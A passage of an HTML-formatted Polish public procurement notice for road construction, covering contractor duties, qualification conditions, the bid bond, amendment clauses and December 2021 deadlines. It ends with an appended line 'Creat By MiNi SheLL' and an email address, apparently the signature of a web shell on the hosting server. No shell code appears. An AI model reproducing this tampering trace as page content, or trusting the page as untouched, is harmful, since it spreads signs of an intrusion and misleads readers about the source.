odcinku<br/>5)	UWAGA: w ramach zamówienia na przedmiotowym odcinku należy wykonać kanał technologiczny <br/>6)	UWAGA: Zamawiający wymaga aby warstwę ścieralną nawierzchni jezdni wykonać całą szerokością jezdni,<br/>7)	Wykonawca zobowiązany jest do umieszczenia tablicy informacyjnej przed realizacją inwestycji oraz po jej realizacji według wzoru określonego przez Zamawiającego,<br/>8)	Prace należy prowadzić z zachowaniem odpowiednich przepisów i instrukcji bezpieczeństwa pracy przy wykonywaniu robót budowlanych, Zamawiający informuje, że jest w posiadaniu Czasowej organizacji ruchu, w związku z czym Wykonawca może wykorzystać przedmiotową organizację lub opracować nową. Wykonawca zobowiązany jest do wprowadzenia Czasowej Organizacji Ruchu na czas budowy. Po zakończonych robotach Wykonawca wprowadzi stałą organizację ruchu<br/>9)	Wykonawca zobowiązany jest do zagospodarowania we własnym zakresie materiałów pochodzących z rozbiórki chodnika<br/>10) Po zakończonych robotach Wykonawca wykona dokumentację powykonawcza, w skład której wchodzić będą między innymi wyniki badań, atesty, deklaracje zgodności, dokumentacja fotograficzna, zawiadomienie o wprowadzeniu czasowej organizacji i zawiadomienie o wprowadzeniu stałej organizacji ruchu oraz inne dokumenty wskazane przez Inspektora, dokument potwierdzający fakt złożenia inwentaryzacji powykonawczej. Wykonawca po otrzymaniu geodezyjnej inwentaryzacji powykonawczej jest zobowiązany do dostarczenia oryginału do Zamawiającego ,<br/><br/>Dopuszczenie rozwiązań równoważnych opisywanym w przypadku opisania przedmiotu zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp<br/>Opisując przedmiot zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp, zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/>Zamawiający nie może odrzucić oferty tylko dlatego, że oferowane roboty budowlane nie są zgodne z normami, ocenami technicznymi, specyfikacjami technicznymi i systemami referencji technicznych, do których opis przedmiotu zamówienia się odnosi, pod warunkiem że wykonawca udowodni w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dotyczy części I - Wykonawca spełni warunek, jeżeli wykaże że:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 zamówienia, które dotyczyło wykonania robót budowlanych polegających na budowie, rozbudowie lub przebudowie drogi publicznej minimum klasy Z o wartości nie mniejszej niż 1 500 000,00 zł, <br/>b)	dysponuje następującymi osobami:<br/>	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na minimum jednym zadaniem polegającym na budowie/rozbudowie/ przebudowie drogi publicznej minimum klasy Z o wartości robót drogowych nie mniejszej niż 1 000 000,00 zł,<br/>c)	dysponuje niezbędnym sprzętem do realizacji zamówienia:<br/>	posiada jedną układarkę mas bitumicznych o szerokości min. 9,30 m lub posiada zestaw układarek mas bitumicznych umożliwiających jednoczesne układanie nawierzchni warstwy ścieralnej szerokości min. 9,30 m <br/><br/>Dotyczy części II - Wykonawca spełni warunek, jeżeli wykaże że:<br/>d)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 zamówienia, które dotyczyło wykonania robót budowlanych polegających na budowie, rozbudowie lub przebudowie drogi minimum klasy Z o wartości nie mniejszej niż 300 000,00 zł, <br/>e)	dysponuje następującymi osobami:<br/>	osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na minimum jednym zadaniem polegającym na budowie/rozbudowie/ przebudowie drogi publicznej minimum klasy Z o wartości robót drogowych nie mniejszej niż 300 000,00 zł,<br/>c)	dysponuje niezbędnym sprzętem do realizacji zamówienia:<br/>	posiada jedną układarkę mas bitumicznych o szerokości min. 9,30 m lub posiada zestaw układarek mas bitumicznych umożliwiających jednoczesne układanie nawierzchni warstwy ścieralnej szerokości min. 9,30 m <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 3, 4, 5, 6 podstaw wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - Zamawiający nie wymaga złożenia do oferty informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie. Zamawiający wymaga wykazania tylko zamówień niezbędnych dla spełnienia warunku określonego w SIWZ<br/>c)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego stanowi Załącznik do SWZ.<br/>d)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a)	dla części I 60 000,00 zł<br/>b)	dla części II 9 000,00 zł<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków o których mowa w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2 pzp.<br/>3.	Przedłużenie związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo jeżeli nie jest to możliwe z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach <br/>a)	Pieniądzu<br/>b)	Gwarancji bankowej,<br/>c)	Gwarancjach ubezpieczeniowych,<br/>d)	Poręczeniach udzielonych przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>e)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy.<br/>5.	Wadium wnoszone w pieniądzu zamawiający przechowuje na rachunku bankowym. <br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o którym mowa w pkt 13 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>7.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 pzp<br/>8.	Zmawiający zatrzyma wadium w sytuacji wystąpienia ustawowych podstaw do jego zatrzymania, określonych w art. 98 ust. 6 pzp.<br/>9.	Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy, zgodnie z zapisami art. 266 ust. 1 pkt 14) ustawy pzp Zamawiający odrzuci taką ofertę. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, z którego wynikać<br/>będzie które usługi / roboty wykonują poszczególni Wykonawcy, zgodnie z załącznikiem do SWZ<br/>– oświadczenie dot. Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>16) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>17) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty<br/>oświadczenie z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy.<br/>18) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>19) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą na trzy dni przed zwarciem umowy w sprawie zamówienia publicznego są<br/>zobowiązaniu przedstawić zamawiającemu stosowną umowę regulującą współprace tych<br/>Wykonawców występujących wspólnie, zawierającą w swej treści następujące postanawiania: <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 9<br/>1.	Zmiana lub odstąpienie od Umowy może nastąpić na zasadach określonych w przepisach Kodeksu cywilnego, ustawy Prawo zamówień publicznych oraz określonych w niniejszej Umowie. <br/>2.	Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez stronny.<br/>3.	Strony ustalają, że zmiana umowy może nastąpić wyłącznie w sytuacjach: <br/>1)	Zmiany terminu wykonania umowy o czas opóźnienia realizacji przedmiotu umowy, jeżeli takie opóźnienie wystąpi i będzie miało wpływ na wykonanie przedmiotu umowy, w sytuacji:<br/>a)	wstrzymania (zawieszenia) realizacji przedmiotu umowy (w części lub w całości) na żądanie Zamawiającego z przyczyn niezależnych od Wykonawcy i obiektywnie uzasadnionych na okres trwający łącznie ponad 48 godzin,<br/>b)	wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,<br/>c)	istotnej zmiany w dokumentacji dot. przedmiotu umowy dokonanej na wniosek Zamawiającego,<br/>d)	wystąpienia znalezisk archeologicznych bądź niewybuchów, niewypałów lub wykopalisk archeologicznych,<br/>e)	wystąpienia awarii lub katastrofy budowlanej, nie wynikającej z działania lub zaniechania Wykonawcy,<br/>f)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami w tym niedopuszczenia do realizacji przedmiotu umowy (w części lub w całości) bądź wstrzymania (zawieszenia) realizacji przedmiotu umowy (w części lub w całości) przez uprawniony organ z przyczyn niezależnych od Wykonawcy, wystąpienie, przy czym strona, która nie może prawidłowo wykonywać umowy wskutek działania siły wyższej, jest obowiązana do bezzwłocznego poinformowania drugiej Strony o wystąpieniu działania siły wyższej w terminie 3 dni od wystąpienia tego zdarzenia, pod rygorem utraty uprawnienia do powoływania się na tę okoliczność.<br/><br/>2)	Zamiany osobowe:<br/>a)	zmiana osób, realizujących przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub w innych ustawach,<br/>b)	zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg określony w SiWZ,<br/>c)	zmiany osoby pełniącej funkcję Inspektora nadzoru.<br/>3)	Zmiany organizacji spełnienia świadczenia w zakresie zmiany zasad dokonywania odbiorów świadczonych robot budowlanych. <br/>4)	Zmiany terminu płatności wynikające z wszelkich zmian wprowadzonych do umowy.<br/>5)	Zmiany wysokości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług.<br/>6)	Zmiany umowy w przypadku wydłużenia okresu gwarancji i rękojmi z powodu zmian wprowadzonych do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.soldea.pl/epz/epz/postepowanieedycja.php?idPostepowania=1340</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-14 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com